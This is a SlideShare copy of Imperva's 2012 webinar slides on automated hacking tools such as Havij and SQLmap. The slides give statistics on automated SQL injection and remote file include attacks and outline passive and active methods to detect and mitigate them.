SlideShare une entreprise Scribd logo
1  sur  37
Télécharger pour lire hors ligne
Automated Hacking Tools:
The New Rock Stars in the Cyber Underground




              © 2012 Imperva, Inc. All rights reserved.
Agenda

  Context for HII Reports
  Introducing Automated Hacking
     + Quantifying Automation
     + Hacking Automation Use Cases
     + Sample Tools
  Analyzing Real World Data
  Detection and Mitigation
  Questions and Answers




 2                    © 2012 Imperva, Inc. All rights reserved.
Presenter:
  Amichai Shulman – CTO Imperva

   Speaker at Industry Events
    + RSA, Sybase Techwave, Info Security UK, Black Hat
   Lecturer on Info Security
    + Technion - Israel Institute of Technology
   Former Security Consultant to Banks and
    Financial Services Firms
   Leads the Application Defense Center (ADC)
    + Discovered over 20 commercial application
      vulnerabilities
       – Credited by Oracle, MS-SQL, IBM and others



         Amichai Shulman one of InfoWorld’s “Top 25 CTOs”

                           © 2012 Imperva, Inc. All rights reserved.
HII Report Context

  Hacker Intelligence Initiative is focused at
   understanding how attackers are operating in
   practice
      + A different approach from vulnerability research
  Data set composition
      + ~50 real world applications
      + Anonymous Proxies
  More than 18 months of data
  Powerful analysis system
      + Combines analytic tools with drill down capabilities




  4                        © 2012 Imperva, Inc. All rights reserved.
Introducing Automated Hacking




5            © 2012 Imperva, Inc. All rights reserved.
Quantifying Automation




 6              © 2012 Imperva, Inc. All rights reserved.
Quantifying Automation


               RFI                                                          SQLi
                 Manual
                  2%




                                                                            12%




                                                                                   Manual
                                                                                   Automatic




                                                                      88%
         Automatic
           98%




 7                        © 2012 Imperva, Inc. All rights reserved.
Hacking Automation Use Cases

   Automation affects the magnitude of the threat posed by
    hacking




 Honeypot.org: The Social Dynamics of Hacking

 8                                        © 2012 Imperva, Inc. All rights reserved.
Hacking Automation Use Cases

   Skilled Hackers
     + Create more powerful tools
     + Focus not only on finding vulnerabilities but also on robust
       automation of their exploit (an engineering challenge)
   Professional Hackers (Semi-skilled)
     + Can increase their business faster and more effectively using
       automation
     + Puts more organizations at risk as potential targets
   Unskilled Hackers
     + Increased potential of incidental damages




 9                      © 2012 Imperva, Inc. All rights reserved.
Hacking Automation Use Cases

   Botnets
      + A step further in the evolution of automated hacking
      + Rather than automating a task it is automation of the entire
        operation
   Includes all steps of the operation
      + Target selection
      + Probing
      + Exploit




 10                        © 2012 Imperva, Inc. All rights reserved.
Automated Hacking Tools

   Search engine hacking
      + Discovery phase
      + Mostly botnet based today
   General scanners
      + Probing of chosen targets
   Focused on attack type
   Focused on individual vulnerability
      + Exist as standalone tools and botnet modules




 11                       © 2012 Imperva, Inc. All rights reserved.
Automated Hacking Tools


   High-end                                         Havij
      + Slick GUI (point and                                  + Focused on SQL
        click)                                                  Injection attacks
      + Evasion techniques                                    + Used in attacks by
      + State of the art attack                                 Lulzsec and
        vectors                                                 Anonymous




 12                   © 2012 Imperva, Inc. All rights reserved.
Automated Hacking Tools




 13             © 2012 Imperva, Inc. All rights reserved.
Automated Hacking Tools


   Professional                                    SQLmap
      + Command line                                         + Focused on SQL
      + Ready for                                                Injection
        instrumentation                             FIMAP
                                                             + Focused on Remote
                                                                 File Include




 14                  © 2012 Imperva, Inc. All rights reserved.
Automated Hacking Tools




 15             © 2012 Imperva, Inc. All rights reserved.
Automated Hacking Tools


   WhiteHat flipping                                              Nikto
                                                                    + Public domain,
    sides                                                             low end
      + Tools aimed at                                             Nessus
        vulnerability scanning                                      + Public domain
      + Automation is essential for                                   (some versions),
        continuous testing of                                         very friendly GUI
        large and complex web                                      Acunetix
        applications                                                + Powerful
                                                                      commercial tool,
      + Inherently easier to                                          stolen licenses
        operate                                                       are shared
                                                                      among hackers


 16                   © 2012 Imperva, Inc. All rights reserved.
Analyzing Real World Data




17         © 2012 Imperva, Inc. All rights reserved.
Type of Automation

   The type of automation is tightly related to the nature of
    the vulnerability to be exploited
   SQL Injection
     + Tools that focus on an individual application at a time
     + High volume, high rate traffic generated against a single
        application
   RFI
     + Tools that try to cover as many applications as possible
     + Low volume traffic when watching a single application
   Search Engine Hacking
     + Need to bypass search engine restrictions
     + Highly distributed botnets


                        © 2012 Imperva, Inc. All rights reserved.
Type of Automation




 19             © 2012 Imperva, Inc. All rights reserved.
Type of Automation

   RFI Attacks
   Many sources attack more than one target




                    © 2012 Imperva, Inc. All rights reserved.
Persistence of Sources

   A fair amount of attack sources are persistent over time
      + Persistent source = more than 3 days of activity
      + 30% of SQLi attacks
      + 60% of RFI attacks

                                         10000
              SQLi Attacks (Log scale)




                                          1000



                                           100



                                            10



                                             1
                                                 0   5 10 15 20 25 30 35 40 45 50 55 60 65 70 75 80 85 90 95 100
                                                                                  Activity Days




 21                                                    © 2012 Imperva, Inc. All rights reserved.
Persistence of Sources

   RFI Attacks
   Many consistent attackers




                    © 2012 Imperva, Inc. All rights reserved.
Persistence of Attack Vectors

   RFI Attacks
   Collect URLs that host infection script
   Some URLs are being used consistently over time




                    © 2012 Imperva, Inc. All rights reserved.
Persistence of Attack Vectors

   Many shell URLs are used against more than one target




                    © 2012 Imperva, Inc. All rights reserved.
Country of Origin

   Most attack sources are in the US
   Most high rate automation sources are in China!
                            SQLi                                                                  SQLi
       Country                     Hosts          % of Hosts                 Country                     Hosts       % of Hosts
       USA                            3994                        80         China                           98                   30
       China                           355                         7         USA                             78                   24
       United Kingdom                      75                      2         Netherlands                         9                 3
       Russian Federation                  49                      1         Morocco                             8                 2
       Canada                              40                      1         Egypt                               7                 2
       Republic of Korea                   33                      1         Luxemburg                           7                2
       Germany                             31                      1         Brazil                              7                2
       Brazil                              29                      1         France                              7                2
       India                               28                      1         Indonesia                           6                2
       France                              24                      1         Russian Federation                  6                2




  25                                        © 2012 Imperva, Inc. All rights reserved.
Detection and Mitigation




26         © 2012 Imperva, Inc. All rights reserved.
General

   Motivation
     + Automated hacking accounts for a large portion of attack traffic
     + Being able to detect malicious automation dramatically reduces
       the stress on other mechanisms designed to detect specific
       attacks
   Challenge
     + Hard to implement WITHIN applications as automation can be
       applied against each and every part of the application or the
       underlying application server




                        © 2012 Imperva, Inc. All rights reserved.
Detecting Automated Hacking - Passive

   Passive Methods
      + Watch network traffic “as-is”
      + Non intrusive, do not affect user experience
   Traffic Shape Indicators
      + We measure suspicious requests (rather than ALL requests)
      + Measured attributes
          – Rate
          – Rate change (ramp-up speed)
          – Volume
      + Difficult to measure in an inherently noisy source (NAT)
   Request Shape Indicators
      + Missing headers
      + Mismatch between headers and location



 28                       © 2012 Imperva, Inc. All rights reserved.
Detecting Automated Hacking - Passive




 29              © 2012 Imperva, Inc. All rights reserved.
Detecting Automated Hacking - Active

   Introduce changes into the server response
      + Test client’s reaction to changes
      + May affect user experience – use with care
      + Verify type of user agent
   Browsers support Javascript and an appropriate DOM
      + Client is expected to complete some computation
      + Application / GW can validate the computed value
   Browsers comply with HTML tags (IMG, IFRAME)
      + Client is expected to access resource referenced by embedded
        tags
      + Failure to access the resources implies that client is an
        automated script


 30                      © 2012 Imperva, Inc. All rights reserved.
Mitigation - Wisdom of the Crowds

   Detected automation feeds into building fingerprints of
    tools and reputation data for sources
   Leveraged when data is collected within a community
   Recent regulatory changes endorse the concept of
    community
   Drop requests matching fingerprints or coming from ill
    reputed sources




 31                  © 2012 Imperva, Inc. All rights reserved.
Mitigation – Challenges and Metering

   Introduce changes to the response that
    require a true browser user-agent before
    letting any further requests within a
    session
      + Application / GW keeps sending the test for any
        request not in a validated session
      + A session is validated only if user-agent
        responds properly
   Introduce changes to the response that
    (based on the previous enforcement)
    introduce client side latency
      + Challenge the client to solve a mathematical
        riddle
      + Partial hash collisions are a good example


 32                      © 2012 Imperva, Inc. All rights reserved.
Mitigation (cont.)

   Introduce CAPTCHA or other test to tell apart a human
    operator from a script




  33                 © 2012 Imperva, Inc. All rights reserved.
Summary

  Automation is ruling the threat landscape
      + It accounts for the lion share of attack traffic

  Automation is used in various forms
      + In depth scanning / attack of a single target
      + Wide breadth scanning / attack of multiple applications
      + Distributed scanning / attack of single / multiple applications




 34                       © 2012 Imperva, Inc. All rights reserved.
Summary (cont.)


   Detection and mitigation are essential for reducing noise
    and focusing resources on the most complex attacks
   Detection and mitigation are most effectively deployed
    out side of the application
   Detection and mitigation must include a combination of
    passive and active measures
   Detection and mitigation are best utilized within a
    community that can generate reputation data



 35                  © 2012 Imperva, Inc. All rights reserved.
Webinar Materials

    Join Our LinkedIn Group,
    Imperva Data Security Direct for…

                                                                Answers to
          Post-Webinar
                                                                 Attendee
           Discussions
                                                                Questions



            Webinar
                                                       Webinar Slides
         Recording Link


                    © 2012 Imperva, Inc. All rights reserved.
www.imperva.com




- CONFIDENTIAL -

Contenu connexe

Similaire à Automated Hacking Tools - Meet the New Rock Stars in the Cyber Underground

Deconstructing Application DoS Attacks
Deconstructing Application DoS AttacksDeconstructing Application DoS Attacks
Deconstructing Application DoS AttacksImperva
 
Unmasking Anonymous: An Eyewitness Account of a Hacktivist Attack
Unmasking Anonymous: An Eyewitness Account of a Hacktivist AttackUnmasking Anonymous: An Eyewitness Account of a Hacktivist Attack
Unmasking Anonymous: An Eyewitness Account of a Hacktivist AttackImperva
 
Assessing the Effectiveness of Antivirus Solutions
Assessing the Effectiveness of Antivirus SolutionsAssessing the Effectiveness of Antivirus Solutions
Assessing the Effectiveness of Antivirus SolutionsImperva
 
Lessons Learned From the Yahoo! Hack
Lessons Learned From the Yahoo! HackLessons Learned From the Yahoo! Hack
Lessons Learned From the Yahoo! HackImperva
 
Top Security Trends for 2013
Top Security Trends for 2013Top Security Trends for 2013
Top Security Trends for 2013Imperva
 
Security Intelligence: Advanced Persistent Threats
Security Intelligence: Advanced Persistent ThreatsSecurity Intelligence: Advanced Persistent Threats
Security Intelligence: Advanced Persistent ThreatsPeter Wood
 
Thread Fix Tour Presentation Final Final
Thread Fix Tour Presentation Final FinalThread Fix Tour Presentation Final Final
Thread Fix Tour Presentation Final FinalRobin Lutchansky
 
Key Resources - z/Assure Sales Presentation
Key Resources - z/Assure Sales PresentationKey Resources - z/Assure Sales Presentation
Key Resources - z/Assure Sales Presentationrfragola
 
The State of Application Security: What Hackers Break
The State of Application Security: What Hackers BreakThe State of Application Security: What Hackers Break
The State of Application Security: What Hackers BreakImperva
 
The State of Application Security: What Hackers Break
The State of Application Security: What Hackers BreakThe State of Application Security: What Hackers Break
The State of Application Security: What Hackers BreakImperva
 
How can SMEs combat cyberattacks through automated vulnerability management?
How can SMEs combat cyberattacks through automated vulnerability management?How can SMEs combat cyberattacks through automated vulnerability management?
How can SMEs combat cyberattacks through automated vulnerability management?SecPod
 
Managing Your Application Security Program with the ThreadFix Ecosystem
Managing Your Application Security Program with the ThreadFix EcosystemManaging Your Application Security Program with the ThreadFix Ecosystem
Managing Your Application Security Program with the ThreadFix EcosystemDenim Group
 
TDIS 2014 - Dealing with the risks: web applications
TDIS 2014 - Dealing with the risks: web applicationsTDIS 2014 - Dealing with the risks: web applications
TDIS 2014 - Dealing with the risks: web applicationsMalik Mesellem
 
2022 APIsecure_Learn from the Past, Secure the Present, Plan for the Future: ...
2022 APIsecure_Learn from the Past, Secure the Present, Plan for the Future: ...2022 APIsecure_Learn from the Past, Secure the Present, Plan for the Future: ...
2022 APIsecure_Learn from the Past, Secure the Present, Plan for the Future: ...APIsecure_ Official
 
Threat Modeling for the Internet of Things
Threat Modeling for the Internet of ThingsThreat Modeling for the Internet of Things
Threat Modeling for the Internet of ThingsEric Vétillard
 
IBM Security AppExchange Spotlight: Threat Intelligence & Monitoring Microso...
IBM Security AppExchange Spotlight: Threat Intelligence &  Monitoring Microso...IBM Security AppExchange Spotlight: Threat Intelligence &  Monitoring Microso...
IBM Security AppExchange Spotlight: Threat Intelligence & Monitoring Microso...IBM Security
 
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?michelemanzotti
 
Defense Federal Acquisition Regulation Supplement; Open Source Software Publi...
Defense Federal Acquisition Regulation Supplement; Open Source Software Publi...Defense Federal Acquisition Regulation Supplement; Open Source Software Publi...
Defense Federal Acquisition Regulation Supplement; Open Source Software Publi...Black Duck by Synopsys
 
A Profile of the Backoff PoS Malware that Hit 1000+ Retail Businesses
A Profile of the Backoff PoS Malware that Hit 1000+ Retail BusinessesA Profile of the Backoff PoS Malware that Hit 1000+ Retail Businesses
A Profile of the Backoff PoS Malware that Hit 1000+ Retail BusinessesLastline, Inc.
 

Similaire à Automated Hacking Tools - Meet the New Rock Stars in the Cyber Underground (20)

Deconstructing Application DoS Attacks
Deconstructing Application DoS AttacksDeconstructing Application DoS Attacks
Deconstructing Application DoS Attacks
 
Unmasking Anonymous: An Eyewitness Account of a Hacktivist Attack
Unmasking Anonymous: An Eyewitness Account of a Hacktivist AttackUnmasking Anonymous: An Eyewitness Account of a Hacktivist Attack
Unmasking Anonymous: An Eyewitness Account of a Hacktivist Attack
 
Assessing the Effectiveness of Antivirus Solutions
Assessing the Effectiveness of Antivirus SolutionsAssessing the Effectiveness of Antivirus Solutions
Assessing the Effectiveness of Antivirus Solutions
 
Lessons Learned From the Yahoo! Hack
Lessons Learned From the Yahoo! HackLessons Learned From the Yahoo! Hack
Lessons Learned From the Yahoo! Hack
 
Top Security Trends for 2013
Top Security Trends for 2013Top Security Trends for 2013
Top Security Trends for 2013
 
Security Intelligence: Advanced Persistent Threats
Security Intelligence: Advanced Persistent ThreatsSecurity Intelligence: Advanced Persistent Threats
Security Intelligence: Advanced Persistent Threats
 
Thread Fix Tour Presentation Final Final
Thread Fix Tour Presentation Final FinalThread Fix Tour Presentation Final Final
Thread Fix Tour Presentation Final Final
 
Key Resources - z/Assure Sales Presentation
Key Resources - z/Assure Sales PresentationKey Resources - z/Assure Sales Presentation
Key Resources - z/Assure Sales Presentation
 
The State of Application Security: What Hackers Break
The State of Application Security: What Hackers BreakThe State of Application Security: What Hackers Break
The State of Application Security: What Hackers Break
 
The State of Application Security: What Hackers Break
The State of Application Security: What Hackers BreakThe State of Application Security: What Hackers Break
The State of Application Security: What Hackers Break
 
How can SMEs combat cyberattacks through automated vulnerability management?
How can SMEs combat cyberattacks through automated vulnerability management?How can SMEs combat cyberattacks through automated vulnerability management?
How can SMEs combat cyberattacks through automated vulnerability management?
 
Managing Your Application Security Program with the ThreadFix Ecosystem
Managing Your Application Security Program with the ThreadFix EcosystemManaging Your Application Security Program with the ThreadFix Ecosystem
Managing Your Application Security Program with the ThreadFix Ecosystem
 
TDIS 2014 - Dealing with the risks: web applications
TDIS 2014 - Dealing with the risks: web applicationsTDIS 2014 - Dealing with the risks: web applications
TDIS 2014 - Dealing with the risks: web applications
 
2022 APIsecure_Learn from the Past, Secure the Present, Plan for the Future: ...
2022 APIsecure_Learn from the Past, Secure the Present, Plan for the Future: ...2022 APIsecure_Learn from the Past, Secure the Present, Plan for the Future: ...
2022 APIsecure_Learn from the Past, Secure the Present, Plan for the Future: ...
 
Threat Modeling for the Internet of Things
Threat Modeling for the Internet of ThingsThreat Modeling for the Internet of Things
Threat Modeling for the Internet of Things
 
IBM Security AppExchange Spotlight: Threat Intelligence & Monitoring Microso...
IBM Security AppExchange Spotlight: Threat Intelligence &  Monitoring Microso...IBM Security AppExchange Spotlight: Threat Intelligence &  Monitoring Microso...
IBM Security AppExchange Spotlight: Threat Intelligence & Monitoring Microso...
 
Apresentação Allen ES
Apresentação Allen ESApresentação Allen ES
Apresentação Allen ES
 
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
 
Defense Federal Acquisition Regulation Supplement; Open Source Software Publi...
Defense Federal Acquisition Regulation Supplement; Open Source Software Publi...Defense Federal Acquisition Regulation Supplement; Open Source Software Publi...
Defense Federal Acquisition Regulation Supplement; Open Source Software Publi...
 
A Profile of the Backoff PoS Malware that Hit 1000+ Retail Businesses
A Profile of the Backoff PoS Malware that Hit 1000+ Retail BusinessesA Profile of the Backoff PoS Malware that Hit 1000+ Retail Businesses
A Profile of the Backoff PoS Malware that Hit 1000+ Retail Businesses
 

Plus de Imperva

Cybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 SurveyCybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 SurveyImperva
 
API Security Survey
API Security SurveyAPI Security Survey
API Security SurveyImperva
 
Imperva ppt
Imperva pptImperva ppt
Imperva pptImperva
 
Beyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountBeyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountImperva
 
Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds Imperva
 
Making Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to NarrativesMaking Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to NarrativesImperva
 
How We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over LunchHow We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over LunchImperva
 
Survey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber SecuritySurvey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber SecurityImperva
 
Companies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPRCompanies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPRImperva
 
Rise of Ransomware
Rise of Ransomware Rise of Ransomware
Rise of Ransomware Imperva
 
7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged Vendors7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged VendorsImperva
 
SEO Botnet Sophistication
SEO Botnet SophisticationSEO Botnet Sophistication
SEO Botnet SophisticationImperva
 
Phishing Made Easy
Phishing Made EasyPhishing Made Easy
Phishing Made EasyImperva
 
Imperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense ReportImperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense ReportImperva
 
Combat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat IntelligenceCombat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat IntelligenceImperva
 
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing ExponentiallyHTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing ExponentiallyImperva
 
Get Going With Your GDPR Plan
Get Going With Your GDPR PlanGet Going With Your GDPR Plan
Get Going With Your GDPR PlanImperva
 
Cyber Criminal's Path To Your Data
Cyber Criminal's Path To Your DataCyber Criminal's Path To Your Data
Cyber Criminal's Path To Your DataImperva
 
Combat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data SecurityCombat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data SecurityImperva
 
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2: New attacks on the Internet’s Next Generation FoundationHacking HTTP/2: New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation FoundationImperva
 

Plus de Imperva (20)

Cybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 SurveyCybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 Survey
 
API Security Survey
API Security SurveyAPI Security Survey
API Security Survey
 
Imperva ppt
Imperva pptImperva ppt
Imperva ppt
 
Beyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountBeyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked account
 
Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds
 
Making Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to NarrativesMaking Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to Narratives
 
How We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over LunchHow We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over Lunch
 
Survey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber SecuritySurvey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber Security
 
Companies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPRCompanies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPR
 
Rise of Ransomware
Rise of Ransomware Rise of Ransomware
Rise of Ransomware
 
7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged Vendors7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged Vendors
 
SEO Botnet Sophistication
SEO Botnet SophisticationSEO Botnet Sophistication
SEO Botnet Sophistication
 
Phishing Made Easy
Phishing Made EasyPhishing Made Easy
Phishing Made Easy
 
Imperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense ReportImperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense Report
 
Combat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat IntelligenceCombat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat Intelligence
 
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing ExponentiallyHTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
 
Get Going With Your GDPR Plan
Get Going With Your GDPR PlanGet Going With Your GDPR Plan
Get Going With Your GDPR Plan
 
Cyber Criminal's Path To Your Data
Cyber Criminal's Path To Your DataCyber Criminal's Path To Your Data
Cyber Criminal's Path To Your Data
 
Combat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data SecurityCombat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data Security
 
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2: New attacks on the Internet’s Next Generation FoundationHacking HTTP/2: New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
 

Dernier

UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8DianaGray10
 
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsSafe Software
 
NIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopNIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopBachir Benyammi
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarPrecisely
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPathCommunity
 
20230202 - Introduction to tis-py
20230202 - Introduction to tis-py20230202 - Introduction to tis-py
20230202 - Introduction to tis-pyJamie (Taka) Wang
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxMatsuo Lab
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Will Schroeder
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaborationbruanjhuli
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024D Cloud Solutions
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URLRuncy Oommen
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesDavid Newbury
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Websitedgelyza
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...Aggregage
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostMatt Ray
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Commit University
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxGDSC PJATK
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfDianaGray10
 

Dernier (20)

UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8
 
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
 
NIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopNIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 Workshop
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity Webinar
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation Developers
 
20230202 - Introduction to tis-py
20230202 - Introduction to tis-py20230202 - Introduction to tis-py
20230202 - Introduction to tis-py
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptx
 
201610817 - edge part1
201610817 - edge part1201610817 - edge part1
201610817 - edge part1
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URL
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond Ontologies
 
COMPUTER 10 Lesson 8 - Building a Website
